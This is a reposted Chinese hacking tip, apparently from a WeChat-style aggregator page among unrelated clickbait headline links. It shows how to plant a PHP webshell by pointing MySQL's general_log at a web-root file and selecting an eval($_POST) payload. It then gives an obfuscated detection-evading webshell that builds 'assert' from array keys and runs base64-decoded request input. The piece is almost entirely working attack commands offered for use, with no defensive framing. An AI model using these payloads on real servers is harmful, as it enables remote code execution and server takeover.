终究没有人在意一家民营企业的生死

去泰国看了一场“成人秀”,画面尴尬到让人窒息.....

【少儿禁】马建《亮出你的舌苔或空空荡荡》

网友建议:远离举报者李X夫!

网曝黑人留学生侮辱中国女生是“母狗”,网友愤慨:不欢迎洋垃圾

生成图片,分享到微信朋友圈

自由微信安卓APP发布,立即下载! | 提交文章网址
查看原文

SQL语句利用日志写shell

黑白之道 2021-04-25



outfile被禁止,或者写入文件被拦截;



在数据库中操作如下:(必须是root权限)


show variables like '%general%';  #查看配置

set global general_log = on;  #开启general log模式

set global general_log_file = '/var/www/html/1.php';   #设置日志目录为shell地址

select '<?php eval($_POST[cmd]);?>'  #写入shell


SQL查询免杀shell的语句


SELECT "<?php $p = array('f'=>'a','pffff'=>'s','e'=>'fffff','lfaaaa'=>'r','nnnnn'=>'t');$a = array_keys($p);$_=$p['pffff'].$p['pffff'].$a[2];$_='a'.$_.'rt';$_(base64_decode($_REQUEST['username']));?>"


文章出处:Evi1cg's blog   

原文链接:

https://evi1cg.me/archives/test1.html


推荐文章++++

*win内网中利用ipc弹shell小记

*使用One-Lin3r快速生成反向shell,Privesc

*常见web中间件拿shell


    文章有问题?点此查看未经处理的缓存